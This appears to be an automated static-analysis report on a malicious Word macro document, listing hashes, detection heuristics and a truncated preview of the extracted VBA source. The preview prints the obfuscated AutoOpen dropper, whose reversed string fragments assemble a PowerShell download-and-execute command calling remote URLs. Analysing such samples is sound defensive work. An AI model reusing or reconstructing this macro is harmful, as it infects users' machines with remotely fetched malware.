Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb7ce3342987424e…

MALICIOUS

Office (OLE)

101.0 KB Created: 2018-02-07 08:09:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 8f37ae5b1df0db242f93f2834dac55da SHA-1: a200494f23ad28b42aa0b6e4d58b9c99a90a4910 SHA-256: cb7ce3342987424ea1303adb8172f0172f4bbead7a348263f67bd84630b01059
242 Risk Score

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24009 bytes
SHA-256: 65e4717db24ffe0ff3b45f444e749045049464adb6f844258311a0470b11d997
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fTMzuncvU"
Sub AutoOpen()
On Error Resume Next
nLvjEMRFY = hdHoSfVOBrIK - IsauLti / (3917045 + tjDNbaAOinwC - 4023448 + SOqBOZpkdcImr)
dSFMqQzjX = EDuOnNVMAnAH - VrTusJFaFpj / (4440474 + YbHmUIudlzULBX - 1715485 + HzqVmkUXW)
HZRKzOLrr = uEOSsNBjuwjql - JwqsBJnGkPNicT / (7396354 + JTKiOMsjzIkA - 4914212 + mRoUAAYSph)
Application.Run "HwkTnBLf", qUUcDXczYFwhC
AnTwFKkiz = pPjDizGJ - tYnhLdwuITlKqi / (5441825 + bttbnYCDNiXk - 7145958 + DuOXwJNGHVJQ)
bOLBzlDVG = NiHUWjT - GLJVQrwTiTT / (4126528 + XRXwnrLjljPj - 9871583 + fQbndmiPwGGw)
End Sub
Function qUUcDXczYFwhC()
On Error Resume Next
JFNfiiupLpK = azTBRuWX - hdMtUVMLUVP / (6272366 + FiwtsuEhQMqjsa - 6306553 + UjNjFMmWb)
ibYPww = jEfOXRdfulD - BbSsRQWMcu / (6054655 + zmBzotvcSMNzBB - 7850936 + DMjvLwhmQM)
XviHf = VzPDmZiOlPjrAp - FpNTqPbwIPN / (6985825 + DEPhbzZcDIba - 3628744 + DKXVjFkrrYwW)
zwZYEQuMkzM = jUBCRrisj + Mid(StrReverse("XtUXqKabAjHbWi+gawyXr'+'KrzkFucsPEcbvKj"), 16, 10)
bmWwXbNlk = DPwBhltXc - mluhfBLNrk / (1132595 + fZwUDlWbW - 1912944 + GcpmpKmDwD)
mRWJk = QVtqJuATIO - lkYFMiHB / (261587 + cMnEpPW - 505743 + jHOKJba)
odCMzORk = bbaDBKzr - NkzDwwC / (3846768 + IGlUfiQEhBXZP - 5701545 + VjaazbCqNkBl)
QXjuztL = uDGoYowLjAw + Mid(StrReverse("fKaWaWLjwaQhtXCnAvZhKRAZwniregaw+gaw'+'tagaw+gawc-sgaw+g'+'awsgaw+gawibBaX+BaXmi//:pt'+'th?/EWlTN/mga'+'w+gawoc.aiiiGUjXh"), 8, 90)
JnCvdDRA = bHwwnwdvUf - GLiPWbWLGPYjds / (2244805 + wqLjuKS - 8940164 + idKiYutEDi)
iodcIsmQORc = SUokUJMECXSEbt - FJwEwsnrswL / (6336119 + VfiaNRkcBaPk - 9629042 + rBLZjlsok)
ziEYBcDT = wiBfdwlI - fiXsrqJJEEi / (6382553 + wiwpjZcvoj - 9020736 + biQFwEoGHS)
rsmHflCOwlb = AkLMqVS + Mid(StrReverse("GKqqGWvJSwvIrRvuuwTshgRzP+RzPa'+'w+gaw4.'+'cfRzP+'+'RzPsaygaw+gawRzP+RzPXrgaw+gaw(gaw+gaw'+'sgaw+gawh4gaw+ga'+'weRzP+RzPlILZIFR'+'zP+RzP'+'gaw+gawdaOILZlnWILZoDRz'+'P+RzPsgaw+g'+'awBaX+BaXh4.gaw+gawUYYyamfjnuUtNMswnfoTdKlIT"), 22, 184)
JVkMQTuwUA = XinQMjjqCcWP - sDFztaMf / (9755066 + hMrCTAwsvzt - 8760242 + LocaacdrmE)
WGKCkpm = jYjkJASFYG - DVdNqFk / (5160787 + SzhuLQAlC - 4147682 + uHVWvQMjuioV)
TJdTIa = EkGwNlXGL - DhqpYsAhCCVL / (9243606 + HSZtAjo - 5786284 + RpaKDXQwiiV)
hNHhWI = TIUiZcokCbi + Mid(StrReverse("dhswTVZClpgaw+gaw.gnigagaw+gawtsgaw+gaw-sgaw'+'+gawda/gawBaX+BaX'+'+gaw'+'/gaRzP+RzPw+gaw:p'+'tgaw+gawth?/CBaX+BaX1Sgaw+gawjT"), 3, 115)
bYiADtkkLI = toFpvMdGfzZCZA - hwKmErcajSNwGI / (7251161 + sLXvlENbEUXDX - 8473782 + fboKzmzNCQOW)
IVTfFw = hNWztFjrBE - ciihjTZC / (8258579 + iXRwnFtzVfX - 6508630 + uqzZJRLudWchP)
WFzLnalm = RiirLfr - qFzGAmtjZpusoq / (7284871 + PlfkEApRYCcTmn - 2365201 + wvAsaDR)
VDrRN = pEbnruwlS + Mid(StrReverse("kllugawtVIC+BaX+BaXgaw+'+'gaBaX+BaXwVgaw+BaX+RzP+RzP'+'B'+'aXgawIgaw+'+'g'+'awCgBaX+BaXaw+gawcgaw+gawegaw+'+'gawjbo'+'-wVIC+V'+'gaw+gawICegaw+'+'gawVIC+VIBaX+'wTHDrbXzAwjjkXAzGFBvfRiDLz"), 27, 155)
RNoVUw = aAGupPihzKZ - lctttqtUMTHjHC / (456517 + CmCbwMmBrAK - 5560744 + WTOcDMKtcWjzU)
dHBfQlk = GtXmnNDfK - wvYqrCsj / (3147059 + qAsHDqrlZQS - 5427724 + zjIUNXPorIG)
mTIJIAfPz = InTBadDirZG - QjwVRFu / (7931167 + RbKjhiIAnz - 8324909 + dvCXjwnPtmYZ)
bPuSboYC = BzznmWPaso + Mid(StrReverse("OiCoWXXrzhhgawIgaw+gBaX+BaXawC(&;)CDSyXr ,gaw+gaw)(gaw+gawshgaw+RzP+RzPgaw4RzP+Rz'+'PgNIgaw+gawLZgaBaX+BaXw+gawiILZrgaw+gawtSga'+'w+gawoNnMRUndC"), 9, 125)
GdosREmtUTd = qMJSszuh - aONmnuz / (6544815 + HZcfCkbd - 9908477 + GRNcVWEqORGn)
fljwo = LiwKtRrjwo - HriLJYrPzMb / (7393965 + msQjEiQA - 3738826 + RwEZhLI)
rnswJrj = JciVirs - pZqnIkvlYBB / (1568303 + NXinmNOEzJE - 8361922 + RJdQOZqX)
EUsHPi = EiauWlOR + Mid(StrReverse("PnNivJovuotbT)'x'+]5[CIlbUP:vne$+]31[ciLbUp:Vne$ ( & |)42qCPZzzzHfbIRj"), 14, 44)
jqSuUQvYiFa = hrdibqQ - wwSmIHncRFUj / (3816357 + qjOlwdur - 7302091 + EZjWvMvDaY)
FszdD = zOOKtthiTbYk - AwPpsmrFMw / (6514770 + YQjFJ
... (truncated)